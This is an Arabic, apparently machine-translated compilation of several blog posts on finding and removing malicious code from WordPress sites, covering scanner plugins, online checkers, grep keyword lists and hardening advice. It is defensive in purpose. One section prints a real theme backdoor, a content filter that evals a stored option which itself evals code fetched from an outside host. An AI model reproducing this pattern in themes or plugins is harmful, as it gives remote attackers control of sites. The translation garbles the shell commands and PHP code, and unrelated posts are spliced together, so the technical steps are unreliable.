أطلقنا سراحنا كتاب جديد"تسويق المحتوى في في الشبكات الاجتماعية: كيف تصل إلى أذهان المشتركين لديك وتجعلهم يقعون في حب علامتك التجارية.

يشترك

التعليمات البرمجية الضارة هي تعليمات برمجية تتداخل مع التشغيل العادي لموقع الويب. يمكن تضمينه في السمات وقواعد البيانات والملفات والمكونات الإضافية.

المزيد من مقاطع الفيديو على قناتنا - تعلم التسويق عبر الإنترنت مع SEMANTICA

قد تكون نتيجة التعليمات البرمجية الضارة إزالة بعض المحتويات المفيدة أو نشرها على مورد طرف ثالث. وبهذه الطريقة، يمكن للمهاجمين تنظيم سرقة المحتوى. إنه أمر مهين بشكل خاص إذا تعرض مصدر شاب بمقالات أصلية لهذا التأثير. قد يكون لديك انطباع بأنه سرق محتوى من مصدر أعلى مرتبة.

من الممكن أيضًا وضع تعليمات برمجية ضارة موضوع مجاني الروابط المخفيةعلى صفحات الطرف الثالث، في متناول محركات البحث. لن تكون هذه الروابط ضارة دائمًا، ولكن من المؤكد أن وزن الموقع الرئيسي سيتأثر.

الغرض العام من جميع الرموز الضارة هو تعطيل عمل صفحات الويب.

خارجيًا، تظهر التعليمات البرمجية الضارة كمجموعة فوضوية من الأحرف. في الواقع، خلف هذا الهراء يوجد رمز مشفر يحتوي على سلسلة من الأوامر.

كيف تصل التعليمات البرمجية الضارة إلى الموقع

هناك طريقتان لكيفية وصول التعليمات البرمجية الضارة إلى موقع الويب.

1. تنزيل الملفات والمكونات الإضافية من مصادر مشكوك فيها وغير موثوقة. في أغلب الأحيان، تخترق الروابط المشفرة الموقع باستخدام هذه الطرق. نادرًا ما تدخل التعليمات البرمجية الصريحة إلى الموقع بهذه الطريقة.

2. يعقبه اختراق. تعتبر هذه الطريقة أكثر خطورة، لأن اختراق صفحة الويب يجعل من الممكن نقل ليس فقط رمز "لمرة واحدة"، ولكن أيضًا الهياكل الكاملة التي تحتوي على عناصر البرمجيات الخبيثة(برامج ضارة).

من الصعب جدًا تدمير مثل هذا الرمز، لأنه... ويمكن استعادته بعد الإزالة.

التحقق من الموقع بحثًا عن تعليمات برمجية ضارة

يجب أن نتذكر أن هذه الهياكل الخبيثة يمكن أن تظهر ليس فقط في الموضوع النشط، ولكن أيضًا في أي ملف مورد. هناك عدة طرق للعثور عليهم:

• يدويا. للقيام بذلك، تحتاج إلى مقارنة محتويات كافة الملفات الحالية مع الإصدارات غير المصابة من النسخة الاحتياطية. يجب إزالة أي شيء مختلف.
• استخدام المكونات الإضافية الأمنية. على وجه الخصوص، يقدم WordPress المكوّن الإضافي Wordfence Security. لديه خيار فحص ملفات الصفحة بحثًا عن محتوى التعليمات البرمجية الأجنبية.
• بمساعدة دعم الاستضافة. يحق لمالك الموقع الاتصال به لطلب فحص المورد باستخدام برنامج مكافحة الفيروسات الخاص به. ونتيجة لذلك، فإنها سوف تقدم تقريرا يوضح وجود الملفات المصابة. يمكن مسح هذه الملفات من البنيات الدخيلة باستخدام محرر نص عادي.
• عن طريق SSH الوصول إلى الموقع. يتم إجراء البحث نفسه باستخدام الأوامر:

يجد / الدليل الحاليالصفحات -نوع f -iname "*" -exek -"eval" () \; > ./eval.log

ابحث عن دليل الصفحة الحالي / - نوع f -iname "*" -exek-"base64" () \; > ./base64.log

ابحث عن دليل الصفحة الحالي / - نوع f -iname "*" -exek -"file_get_contents" () \; > ./file_get_contents.log

نتيجة إعدامهم، ظهرت معلومات حول الملفات المشبوهة. ستتم كتابة قائمة هذه الملفات في السجل المخزن في الدليل الحالي.

• فحص الموقع بحثًا عن تعليمات برمجية ضارة باستخدام وظيفة التقييم. تعمل وظيفة PHP هذه على تشغيل أي كود، حتى لو كان مشفرًا. كأحد الوسائط، يتم توفير نوع التشفير لمدخل هذه الوظيفة (عادةً base64_decode أو str_rot13). بفضل استخدام الترميزات الشائعة، تبدو التعليمات البرمجية الضارة وكأنها مجموعة لا معنى لها من الأحرف اللاتينية.

افتح محرر الصفحة.

انسخ محتويات ملف jobs.php إلى الحافظة.

الصقه في أي محرر نصوص (المفكرة).

ابحث عن أمر التقييم.

• قبل إزالة التعليمات البرمجية الضارة، قم بتحليل المعلمات التي تتوقعها الوظيفة كمدخلات. لأن يتم استلام المعلمات في شكل مشفر ويجب فك تشفيرها باستخدام أجهزة فك التشفير. بعد أن اعترفت معلمة الإدخال، يمكنك أن تقرر الاحتفاظ به في نص ملف jobs.php.

إزالة التعليمات البرمجية الضارة

بمجرد اكتشاف تعليمات برمجية ضارة، ما عليك سوى إزالتها كما يلي: سلسلة منتظمةفي ملف نصي.

الحماية ضد التعليمات البرمجية الضارة

ولمنع ظهور تعليمات برمجية ضارة على الموقع، من الضروري اتباع عدد من الإجراءات الوقائية.

استخدم فقط البرامج المثبتة:

• قم بتنزيل التوزيعات من المصادر الموثوقة فقط.
• قم بتشغيل تحديث برنامج الخادم خلال هذا الوقت.
• قم بإجراء عمليات تدقيق منتظمة لنظام أمان الخادم الخاص بك.
• إزالة البرامج النصية لتصحيح الأخطاء التي عفا عليها الزمن.

قم بتعيين كلمات مرور قوية على برنامج الخادم الخاص بك:

• ابتكر تصميمًا مكونًا من 12 حرفًا، بما في ذلك الأرقام والحروف لحالات مختلفة.
• لكل خدمة، قم بإنشاء كلمة مرور فريدة خاصة بك.
• قم بتغيير كلمات المرور الخاصة بك كل 3 أشهر.

بيانات التحكم المدخلة من قبل المستخدمين:

• قم بإعداد مرشحات ترميز HTML في حقول الإدخال، والتي سيتم تضمين محتوياتها في رمز الصفحة.
• قم بتنظيم فحص من جانب الخادم لبيانات الإدخال للتأكد من توافقها مع الفاصل الزمني المقبول.
• استخدم واف. تطبيق الويبجدار الحماية هو أداة قويةحماية الموقع من هجمات القراصنة.

تقييد حقوق الوصول إلى الموارد الخاصة بك.

حظر أو تقييد الوصول إلى أدوات الإدارة الخاصة بمحرك موقع الويب الخاص بك وقواعد البيانات الخاصة به. قم أيضًا بحظر الوصول إلى ملفات التكوين والنسخ الاحتياطية لرمز الإنتاج.

تلك المواقع التي لديها القدرة على تنزيل ملفات المستخدم هي الأكثر عرضة لمثل هذا الاختراق من خلال التعليمات البرمجية الضارة.

1. تنظيم الحماية ضد الروبوتات. لهذه الأغراض، تم تجهيز العديد من أنظمة إدارة المحتوى (CMS) بمكونات إضافية خاصة؛

2. قم بإعداد التحقق من صحة إدخال المستخدم:

• منع إدراج كود JavaScript داخل البنية t>.
• احتفظ بقائمة علامات HTML الآمنة وقم بتصفية التركيبات غير المضمنة في هذه القائمة.
• تحليل الروابط التي يرسلها المستخدمون.
• لهذا هناك خدمات خاصة، على سبيل المثال واجهة برمجة تطبيقات التصفح الآمن. يسمح لك بالتحقق من أمان المستند عن طريق عنوان URL.

كيفية منع وضع تعليمات برمجية ضارة عن طريق الخطأ.

• راقب البرامج التي تستخدمها بعناية:

قم بتنزيل المكتبات وملحقات CMS من المصادر الموثوقة فقط، ويفضل من المواقع الرسمية.

ادرس كود الامتدادات غير القياسية التي ستقوم بتثبيتها على محرك موقع الويب الخاص بك.

• ضع إعلاناتك بعناية شديدة:

انشر الإعلانات على موقعك والتي يتم عرضها فقط بواسطة معلنين موثوقين.

حاول نشر محتوى ثابت على صفحتك.

احذر البرامج التابعةمع الكتل المخفية.

يعد WordPress هو المحرك الأكثر شيوعًا لإنشاء مواقع ومدونات معلوماتية متنوعة. أمان موقع الويب الخاص بك هو أكثر من أمان بياناتك. وهذا أكثر أهمية، لأنه يمثل أيضًا سلامة جميع المستخدمين الذين يقرؤون مواردك ويثقون بها. ولهذا السبب من المهم جدًا ألا يكون الموقع مصابًا بالفيروسات أو أي أكواد ضارة أخرى.

سننظر في كيفية حماية WordPress من القرصنة في أحد المقالات القادمةوالآن أريد أن أخبرك بكيفية التحقق من موقع WordPress بحثًا عن الفيروسات والأكواد الضارة للتأكد من أن كل شيء آمن.

الخيار الأول الذي يتبادر إلى ذهنك هو أنك تعرضت للاختراق من قبل المتسللين وقاموا ببناء أبوابهم الخلفية في كود موقعك حتى تتمكن من إرسال رسائل غير مرغوب فيها ووضع روابط وأشياء سيئة أخرى. يحدث هذا في بعض الأحيان، ولكن هذه حالة نادرة إلى حد ما إذا قمت بالتحديث في الوقت المحدد برمجة.

هناك الآلاف من سمات WordPress المجانية والمكونات الإضافية المتنوعة، وقد يشكل هذا تهديدًا بالفعل. إنه شيء عندما تقوم بتنزيل قالب من موقع WordPress وآخر تمامًا عندما تجده على الموقع الأيسر. يمكن للمطورين عديمي الضمير تضمين العديد من الرموز الضارة في منتجاتهم. يكون الخطر أكبر إذا قمت بتنزيل قوالب متميزة مجانًا، حيث يمكن للمتسللين، دون المخاطرة بأي شيء، إضافة نوع من الثغرة الأمنية التي يمكنهم من خلالها اختراق ما يحتاجون إليه والقيام به. ولهذا السبب يعد فحص موقع WordPress بحثًا عن الفيروسات أمرًا في غاية الأهمية.

فحص موقع ووردبريس بحثاً عن الفيروسات

أول شيء يجب أن تبحث عنه عند فحص موقع ما بحثًا عن الفيروسات هو ملحقات ووردبريس. يمكنك فحص موقعك بسرعة وسهولة والعثور على المناطق المشبوهة من التعليمات البرمجية التي تستحق الاهتمام بها، سواء كانت في القالب أو البرنامج الإضافي أو Wodpress الأساسي نفسه. دعونا نلقي نظرة على عدد قليل من أكثر الإضافات الشعبية:

1.TOC

يتحقق هذا المكون الإضافي البسيط للغاية من جميع السمات المثبتة على موقعك لمعرفة ما إذا كانت تحتوي على تعليمات برمجية ضارة. يكتشف البرنامج الإضافي الروابط المخفية المشفرة باستخدام إدخال كود Base64، ويعرض أيضًا معلومات مفصلة حول المشكلات التي تم العثور عليها. في أغلب الأحيان، لا تكون أجزاء التعليمات البرمجية الموجودة فيروسات، ولكنها قد تكون خطيرة، لذا يجب عليك الانتباه إليها.

يفتح "مظهر" -> "تاك"ثم انتظر حتى يتم فحص كافة المواضيع.

2. الماسح الضوئي لكبار الشخصيات

يشبه إلى حد كبير الماسح الضوئي TOC للموضوعات، ولكنه ينتج المزيد معلومات مفصلة. نفس قدرات الكشف عن الارتباط رمز مخفيوغيرها من الإدخالات الضارة. ما عليك سوى فتح عنصر VIP Scanner في قسم الأدوات وتحليل النتيجة.

قد يكون كافيا لإزالة ملفات اضافيةعلى سبيل المثال Desktop.ini. أو تحتاج إلى إلقاء نظرة أكثر تفصيلاً على ما يحدث في الملفات التي تستخدم base64.

3. مكافحة البرامج الضارة من GOTMLS.NET

لا يسمح لك هذا البرنامج الإضافي بفحص سمات الموقع وجوهره بحثًا عن الفيروسات فحسب، بل يسمح لك أيضًا بحماية الموقع من كلمات مرور القوة الغاشمة وهجمات XSS وSQLInj المختلفة. يتم إجراء البحث بناءً على التوقيعات ونقاط الضعف المعروفة. يمكن إصلاح بعض نقاط الضعف في الموقع. لبدء فحص الملفات، افتح "مكافحة مالفاري"الخامس القائمة الجانبيةو اضغط "تشغيل المسح":

قبل أن تتمكن من إجراء الفحص، تحتاج إلى تحديث قواعد بيانات التوقيع الخاصة بك.

4. سياج الكلمات

هذا هو واحد من الإضافات الأكثر شعبية ل حماية ووردبريسوالمسح بحثًا عن التعليمات البرمجية الضارة. وبصرف النظر عن الماسح الضوئي، والذي يمكنه العثور على معظم الإشارات المرجعية في كود ووردبريس، هنالك حماية دائمةمن أنواع مختلفةالهجمات والقوة الغاشمة كلمة المرور. أثناء البحث، يجد البرنامج المساعد المشاكل المحتملةمع العديد من المكونات الإضافية والموضوعات، تشير إلى الحاجة إلى تحديث WordPress.

افتح علامة التبويب "WPDefence"في القائمة الجانبية ثم انتقل إلى علامة التبويب "مسح"و اضغط "ابدأ المسح":

قد يستغرق المسح وقت محددولكن عند الانتهاء سيظهر لك تقرير مفصل بالمشكلات التي تم العثور عليها.

5. مكافحة الفيروسات

هذا مكون إضافي بسيط آخر سيقوم بفحص قالب موقع الويب الخاص بك بحثًا عن تعليمات برمجية ضارة. العيب هو أنه يقوم بالمسح فقط القالب الحالي، ولكن يتم عرض المعلومات بتفاصيل كافية. سترى جميع الوظائف الخطيرة الموجودة في الموضوع ومن ثم يمكنك التحليل بالتفصيل ما إذا كانت تشكل أي خطر. ابحث عن عنصر "مضاد للفيروسات"في الإعدادات ثم انقر فوق "مسح قوالب السمات الآن":

6. مدقق النزاهة

ومن المستحسن أيضًا التحقق من سلامتها ملفات ووردبريس، في حالة تسجيل الفيروس بالفعل في مكان ما. يمكنك استخدام البرنامج المساعد Integrity Checker لهذا الغرض. فهو يتحقق من جميع الملفات الأساسية والمكونات الإضافية والملفات للتغييرات. في نهاية الفحص، سترى معلومات حول الملفات التي تم تغييرها.

خدمات عبر الانترنت

هناك أيضًا العديد من الخدمات عبر الإنترنت التي تسمح لك بالتحقق من موقع WordPress بحثًا عن الفيروسات أو التحقق من القالب فقط. وهنا بعض منها:

themecheck.org- يمكنك تنزيل أرشيف السمات ويمكنك رؤية جميع التحذيرات الممكنة وظائف ضارة، والتي تستخدم فيه. لا يمكنك عرض معلومات حول موضوعك فحسب، بل يمكنك أيضًا عرض معلومات حول السمات الأخرى التي تم تحميلها بواسطة مستخدمين آخرين، وكذلك إصدارات مختلفةالمواضيع. مهما كانت المكونات الإضافية التي تجدها يمكن العثور عليها من خلال هذا الموقع. فحص موضوعات ووردبريسهو أيضا مهم جدا.

virustotal.com- مورد معروف حيث يمكنك التحقق من موقع الويب الخاص بك أو ملف القالب بحثًا عن الفيروسات.

ريسكان.برو- فحص موقع WordPress بحثًا عن الفيروسات باستخدام هذه الخدمة، ويتم إجراء تحليل ثابت وديناميكي للكشف عن عمليات إعادة التوجيه المحتملة؛ فحص الموقع ضد القوائم السوداء المختلفة.

sitecheck.sucuri.net- خدمة بسيطة لفحص المواقع والمواضيع بحثاً عن الفيروسات. هناك مكون إضافي لـ WordPress. يكتشف الروابط والبرامج النصية الخطيرة.

فحص يدوي

لا شيء يمكن أن يكون أفضل من فحص يدوي. يحتوي Linux على أداة grep الرائعة التي تسمح لك بالبحث عن تكرارات السلاسل العشوائية في مجلد يحتوي على ملفات. يبقى أن نفهم ما سنبحث عنه:

eval - تسمح لك هذه الوظيفة بالتنفيذ التعسفي كود PHP، لا يتم استخدامه من قبل المنتجات التي تحترم نفسها؛ إذا كان أحد المكونات الإضافية أو السمة يستخدم هذه الوظيفة، مع احتمال بنسبة مائة بالمائة تقريبًا يمكننا القول بوجود فيروس هناك؛

• base64_decode- يمكن استخدام وظائف التشفير جنبًا إلى جنب مع Eval لإخفاء التعليمات البرمجية الضارة، ولكن يمكن استخدامها أيضًا للأغراض السلمية، لذا كن حذرًا؛
• شا1- طريقة أخرى لتشفير التعليمات البرمجية الضارة؛
• com.gzinflate- وظيفة الضغط، نفس الأهداف، مع التقييم، على سبيل المثال، gzinflate(base64_decode(code);
• strrev- إعادة الخط إلى الوراء ليس قبل ذلك، حيث يمكن استخدام خيار للتشفير البدائي؛
• مطبعة- إخراج المعلومات إلى المتصفح، مع gzinflate أو base64_decode، فهو أمر خطير؛
• file_put_contents- لا يزال بإمكان WordPress نفسه أو المكونات الإضافية إنشاء ملفات في نظام الملفات، ولكن إذا كان القالب يفعل ذلك، فيجب أن تكون حذرًا وتحقق من سبب قيامه بذلك، حيث يمكن تثبيت الفيروسات؛
• file_get_contents- يُستخدم في معظم الحالات لأغراض سلمية، ولكن يمكن استخدامه لتنزيل تعليمات برمجية ضارة أو قراءة معلومات من الملفات؛
• لفة- نفس القصة؛
• com.fopen- فتح ملف للكتابة، لأي سبب كان؛
• نظام- تقوم الوظيفة بتنفيذ الأمر نظام لينكس، إذا كان هناك قالب أو مكون إضافي أو WordPress يفعل ذلك، فمن المرجح أن يكون هناك فيروس؛
• رابط رمزي- يخلق روابط رمزيةفي النظام، ربما يحاول الفيروس جعل الرئيسي نظام الملفاتيمكن الوصول إليها من الخارج؛
• ينسخ- نسخ ملف من مكان إلى آخر؛
• com.getcwd- إرجاع اسم دليل العمل الحالي؛
• cwd- تغيير مجلد العمل الحالي؛
• ini_get- يتلقى معلومات عنه إعدادات PHP، في أغلب الأحيان للأغراض السلمية، لكنك لا تعرف أبدًا؛
• تقرير_الخطأ(0)- تعطيل إخراج أية رسائل خطأ؛
• window.top.location.href - وظيفة جافا سكريبت، يُستخدم لإعادة التوجيه إلى صفحات أخرى؛
• اخترق- لذلك، فقط في حالة التحقق، فجأة، قرر المتسلل نفسه إخبارنا.

يمكنك استبدال كل منهما كلمة منفصلةإلى هذا الأمر:

grep -R "اختراق" /var/www/path/to/files/wordpress/wp-content/

أو استخدم برنامجًا نصيًا بسيطًا يبحث عن جميع الكلمات مرة واحدة:

القيم = "base64_decode (
تقييم (base64_decode
gzinflate(base64_decode(
getcwd();
ستريف(
مركز حقوق الإنسان (أورد (
cwd
ini_get
window.top.location.href
ينسخ(
تقييم(
نظام(
الارتباط الرمزي(
تقرير_الخطأ(0)
مطبعة
file_get_contents(
file_put_contents(
فوبين(
اخترق"

مؤتمر نزع السلاح /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

تصل التعليمات البرمجية الضارة إلى الموقع عن طريق الإهمال أو النوايا الخبيثة. تختلف أغراض التعليمات البرمجية الضارة، ولكنها في الأساس تسبب الضرر أو تتدخل عملية عاديةموقع. لإزالة التعليمات البرمجية الضارة على WordPress، يجب عليك العثور عليها أولاً.

ما هي التعليمات البرمجية الضارة الموجودة على موقع WordPress؟

بواسطة مظهرفي أغلب الأحيان، تكون التعليمات البرمجية الضارة عبارة عن مجموعة من الحروف والرموز الأبجدية اللاتينية. في الواقع، هذا رمز مشفر يتم من خلاله تنفيذ هذا الإجراء أو ذاك. يمكن أن تكون الإجراءات مختلفة تمامًا، على سبيل المثال، يتم نشر منشوراتك الجديدة على الفور على مورد تابع لجهة خارجية. هذا هو في الأساس سرقة المحتوى الخاص بك. وللرموز أيضًا "مهام" أخرى، على سبيل المثال، وضع الروابط الصادرة على صفحات الموقع. يمكن أن تكون المهام الأكثر تعقيدًا، ولكن هناك شيء واحد واضح: يجب مطاردة الرموز الضارة وإزالتها.

كيف تصل الرموز الضارة إلى موقع الويب؟

هناك أيضًا العديد من الثغرات التي تسمح بدخول الرموز إلى الموقع.

1. غالبًا ما تكون هذه هي السمات والمكونات الإضافية التي تم تنزيلها من الموارد "اليسرى". على الرغم من أن هذا الاختراق يعتبر نموذجيًا لما يسمى بالروابط المشفرة. لا ينتهي الأمر بالكود الصريح على الموقع.
2. يعد اختراق الفيروس عند اختراق موقع ما هو الأخطر. كقاعدة عامة، يتيح لك اختراق الموقع النشر ليس فقط " رمز لمرة واحدة"، ولكن قم بتثبيت التعليمات البرمجية مع عناصر البرامج الضارة (برنامج ضار). على سبيل المثال، تجد رمزًا وتحذفه، ولكن يتم استعادته بعد مرور بعض الوقت. هناك، مرة أخرى، العديد من الخيارات.

اسمحوا لي أن أشير على الفور إلى أن مكافحة مثل هذه الفيروسات أمر صعب، ولكن الإزالة اليدويةيتطلب المعرفة. هناك ثلاثة حلول للمشكلة: القرار الأول- استخدم المكونات الإضافية لمكافحة الفيروسات، على سبيل المثال، مكون إضافي يسمى BulletProof Security.

هذا الحل يعطي نتائج جيدة، ولكن الأمر يستغرق وقتا، ولو قليلا. هناك أكثر حل جذري, التخلص من الرموز الخبيثة بما فيها الفيروسات المعقدة هو استعادة الموقع من الإعدادات المسبقة نسخ احتياطيةموقع.

وبما أن مشرف الموقع الجيد يقوم بذلك بشكل دوري، فيمكنك الرجوع إلى الإصدار غير المصاب دون أي مشاكل. الحل الثالثبالنسبة للأغنياء والكسالى، ما عليك سوى الاتصال بـ "مكتب" متخصص أو متخصص فردي.

كيفية البحث عن التعليمات البرمجية الضارة على ووردبريس

من المهم أن نفهم أن التعليمات البرمجية الضارة الموجودة على WordPress يمكن أن تكون موجودة في أي ملف على الموقع، وليس بالضرورة في موضوع العمل. يمكنه ابتكار مكون إضافي أو سمة أو رمز "محلي الصنع" مأخوذ من الإنترنت. هناك عدة طرق لمحاولة العثور على تعليمات برمجية ضارة.

طريقة 1.يدويا. يمكنك التمرير عبر جميع ملفات الموقع ومقارنتها بملفات النسخة الاحتياطية غير المصابة. إذا وجدت رمزًا خاصًا بشخص آخر، فاحذفه.

الطريقة 2.باستخدام الإضافات أمان ووردبريس. على سبيل المثال، . هذا البرنامج المساعد لديه ميزة عظيمة، فحص ملفات الموقع بحثًا عن وجود كود شخص آخر ويتعامل المكون الإضافي مع هذه المهمة بشكل مثالي.

الطريقة 3.إذا كان لديك دعم معقول للاستضافة، ويبدو لك أن هناك شخصًا آخر على الموقع، فاطلب منه فحص موقعك باستخدام برنامج مكافحة الفيروسات الخاص به. سوف يسرد تقريرهم كافة الملفات المصابة. بعد ذلك، افتح هذه الملفات في محرر النصوإزالة التعليمات البرمجية الضارة.

الطريقة الرابعة.إذا كنت تستطيع العمل مع الوصول إلى SSHإلى كتالوج الموقع، ثم تفضل، فهو يحتوي على مطبخ خاص به.

مهم! بغض النظر عن كيفية البحث عن التعليمات البرمجية الضارة، قبل البحث ثم حذف التعليمات البرمجية، قم بإغلاق الوصول إلى ملفات الموقع (قم بتشغيل وضع الصيانة). تذكر حول الرموز التي يتم استعادتها عند حذفها.

ابحث عن الرموز الضارة باستخدام وظيفة التقييم

هناك شيء من هذا القبيل في PHP وظيفة التقييم . يسمح لك بتنفيذ أي كود على سطره. علاوة على ذلك، يمكن تشفير الكود. وبسبب التشفير، تبدو التعليمات البرمجية الضارة وكأنها مجموعة من الأحرف والرموز. الترميزان الشائعان هما:

1. Base64;
2. تعفن13.

وبناءً على ذلك، تبدو وظيفة التقييم في هذه الترميزات كما يلي:

• تقييم (base64_decode(...))
• eval (str_rot13 (...)) // في علامات الاقتباس الداخلية، مجموعات طويلة وغير واضحة من الحروف والرموز..

خوارزمية البحث عن التعليمات البرمجية الضارة باستخدام وظيفة التقييم هي كما يلي (نعمل من لوحة إدارية):

• انتقل إلى محرر الموقع (المظهر → المحرر).
• انسخ ملف jobs.php.
• افتحه في محرر نصوص (على سبيل المثال، Notepad++) وابحث عن الكلمة: تقييم.
• إذا وجدت ذلك، لا تتسرع في حذف أي شيء. عليك أن تفهم ما "تطلب" هذه الوظيفة القيام به. لفهم هذا، يجب فك التشفير. لفك هناك أدوات على الانترنت، تسمى أجهزة فك التشفير.

أجهزة فك التشفير / التشفير

تعمل أجهزة فك التشفير ببساطة. تقوم بنسخ الرمز الذي تريد فك تشفيره ولصقه في حقل وحدة فك التشفير وفك التشفير.

في وقت كتابة هذا المقال، لم أجد رمزًا مشفرًا واحدًا موجودًا في WordPress. لقد وجدت الكود من موقع جوملا. من حيث المبدأ، لا يوجد فرق في فهم فك التشفير. دعونا ننظر إلى الصورة.

وكما ترون في الصورة فإن وظيفة التقييم بعد فك التشفير لم تخرج كود رهيب يهدد أمن الموقع ولكن رابط حقوق الطبع والنشر المشفرة، مؤلف القالب. ويمكن أيضًا إزالته، ولكنه سيعود بعد تحديث القالب إذا لم تستخدم .

مرحبا اصدقاء. هل أنت متأكد من أنه مجاني؟ قالب ووردبريسالذي تستخدمه لمواقع الويب والمدونات الخاصة بك آمن حقًا ولا يحتوي على التهديدات الخفيةوالرمز الخبيث؟ هل أنت متأكد تماما من هذا؟ قطعاً؟)

تعتقد أنك قمت بتشغيل القالب من خلاله، وأزلت الروابط المخفية منه، وبذلك تكون المهمة قد انتهت. تقوم بفحص ملفات الموقع بشكل دوري باستخدام أحد برامج مكافحة الفيروسات، وتبحث في أدوات مشرفي المواقع Yandex في علامة التبويب "الأمان" وتشعر بالارتياح لرؤية الرسالة هناك: " لم يتم اكتشاف أي تعليمات برمجية ضارة على الموقع«.

وهذا ما اعتقدته أيضا. لا أريد أن أزعجك، لكن...

كود خطير مخفي في قوالب WordPress المجانية

هذه هي الرسالة التي تلقيتها الأسبوع الماضي عبر البريد الإلكتروني من شركة الاستضافة الخاصة بي. لقد قدموا مؤخرًا فحص منتظمجميع ملفات الموقع للبحث عن محتوى ضار ووجدوا هذا المحتوى بداخلي!

بدأ كل شيء عندما ذهبت إلى موقع الويب الخاص بي بعد ظهر أحد الأيام ولم أتمكن من تشغيله - ظهرت رسالة مسيئة حول الملفات التي لم يتم العثور عليها في ملحق PHP. بعد أن توترت قليلاً، ذهبت لدراسة محتويات المجلد الموجود على الموقع الموجود على الاستضافة واكتشفت على الفور مشكلة - تمت إعادة تسمية ملف القالب الخاص بي fuctions.php إلى jobs.php.malware، والذي بدا وكأنه يلمح بشكل غامض - كان هناك برنامج مكافحة فيروسات العمل هنا أو شيء من هذا القبيل) بعد أن ذهبت إلى البريد، وجدت التقرير أعلاه من المضيف.

أول شيء فعلته، بالطبع، هو التحقق هذا الملف، درس محتوياته، وفحصه بجميع أنواع مضادات الفيروسات، العشرات خدمات عبر الانترنتللتحقق من وجود فيروسات وما إلى ذلك. — وفي النهاية لم يتم العثور على شيء، وأجمع الجميع بالإجماع على أن الملف آمن تمامًا. بالطبع، أعربت عن شكوكي للمضيف، قائلة إنك أفسدت شيئًا ما، ولكن في حالة حدوث ذلك، طلبت منهم تقديم تقرير عن اكتشاف جزء ضار من التعليمات البرمجية.

وهذا ما أجابوني

ذهبت إلى جوجل للحصول على معلومات حول هذا الرمز وفكرت بجدية ...

كيفية العثور على قطعة من التعليمات البرمجية الضارة في القالب

وكما تبين، فهذه تقنية غير تافهة حقًا تسمح للأطراف المهتمة بنقل البيانات إلى موقعك وتغيير محتويات الصفحات دون علمك! إذا كنت تستخدم قالبًا مجانيًا، إذن أوصي بشدة بالتحقق من وظائفك.php للحصول على الكود التالي:

add_filter('the_content', '_bloginfo', 10001);
وظيفة _bloginfo(محتوى $)(
آخر $ العالمية؛
إذا(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
إرجاع $co؛
) وإلا قم بإرجاع محتوى $؛
}

حتى مع معرفتي الضحلة جدًا بـ PHP، فمن الواضح أنه يتم إنشاء مرشح معين، مرتبط بالمتغير العام للنشر والمحتوى، وهما المسؤولان عن عرض المحتوى فقط على صفحات منشورات المدونة (الشرط is_single). مشبوهة بالفعل أليس كذلك؟ حسنًا، لنرى الآن ما الذي سينتج عنه. هذا الرمزعلى موقعنا.

يبدو أيضًا الخيار المثير للاهتمام blogoption المطلوب في قاعدة البيانات مريبًا للغاية. دعنا نذهب إلى قاعدة البيانات الخاصة بنا بيانات ماي إس كيو إلوابحث عن جدول يسمى wp_options، إذا لم تقم بتغيير البادئات، فسيبدو هكذا افتراضيًا. وفيه نجد السطر الذي يهمنا يسمى blogoption

يا له من جمال! نحن نرى الخيار التالي

return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

أولئك. من موقع معين (وموقع روسي، انتبه) يقومون بإرجاع محتوى يمكن أن يحتوي على أي شيء! أي عدد من الروابط، والأكواد الضارة، والنصوص المعدلة، وما إلى ذلك. عند دخولك إلى الموقع نفسه، يظهر لك خطأ وصول 403، وهذا ليس مفاجئًا. بالطبع، قمت أيضًا بإزالة هذا الخيار من قاعدة البيانات.

وفقًا للمعلومات الواردة من الضحايا، عادةً ما يتم إرجاع المحتوى الدقيق لمقالتك بتعديل واحد فقط - بدلاً من أي نقطة "." المقنعة في النص افتح الرابط! وبالمناسبة، هذا الخيارتتم كتابته إلى قاعدة البيانات عند تثبيت القالب نفسه، ثم يتم تدمير التعليمات البرمجية التي تقوم بذلك بنجاح ذاتيًا. لقد عشت مع مثل هذه القمامة لمدة عامين، ولم يكتشفها أي برنامج مكافحة فيروسات أو خدمة هذا التهديدلكل هذا الوقت. لأكون صادقًا، لم ألاحظ ما إذا كانت هذه الخدعة قد نجحت معي من قبل، أو ما إذا كان مكون الأمان الإضافي الخاص بي قد حظر هذه الميزة (أو ربما قام أحد تحديثات WordPress بإغلاق هذه الثغرة)، لكنه لا يزال غير سار.

الأخلاقية حول الجبن المجاني

ما مدى إعجابك بتطور القوالب التي يتمتع بها "مترجمونا" (أو أولئك الذين ينشرونها في كتالوجاتهم)؟ هذا ليس من أجلك أن تقطع الروابط من التذييل) من المؤسف أنني لا أتذكر المكان الذي قمت بتنزيل القالب الخاص بي منه، لقد كان ذلك منذ وقت طويل، وإلا كنت سأكتب بالتأكيد زوجين من الروابط اللطيفة. وإذا كان لدي في ذلك الوقت نفس التجربة التي لدي الآن، فلن أستخدمها بالتأكيد قالب مجانيأو كملاذ أخير، لن أقوم بالتنزيل من مصادر غير معروفة!

من الأسهل شراء بعض القوالب الرسمية المتميزة مقابل 15-20 دولارًا والعيش بسلام، مع العلم أنه لا توجد ثغرات أو روابط مشفرة فيها، وحتى لو كانت هناك ثغرات أمنية، فسيقوم المطورون بالتأكيد بإصدار تحديث سيتم فيه إزالة هذه الثغرات مغلق. ( بالمناسبة، نشر Artem مؤخرًا مقالًا يتحدث فيه عن القوالب المتميزة ويقدم حتى رموزًا ترويجية لخصومات هائلة لأولئك المهتمين)

واجه كل مشرف موقع مشكلة العثور على نقاط الضعف في موقعه على الويب، والتي يمكن للمهاجم من خلالها تحميل التعليمات البرمجية الضارة الخاصة به، والتي ستؤثر بطريقة أو بأخرى على أداء الموقع بأكمله، حتى استبعاده من نتائج البحث.

في أغلب الأحيان، تحدث العدوى بسبب العامل البشريولكن ماذا تفعل إذا تم اختراق الموقع؟

المشاكل الرئيسية

أهون الشرين هو العثور على الكود الخبيث نفسه وإزالته. تكمن المشكلة الرئيسية في العثور على النقطة الضعيفة التي قام المهاجم من خلالها بتحميل الكود الخاص به إلى موقعك من أجل حماية نفسه من المزيد من السوابق المماثلة.

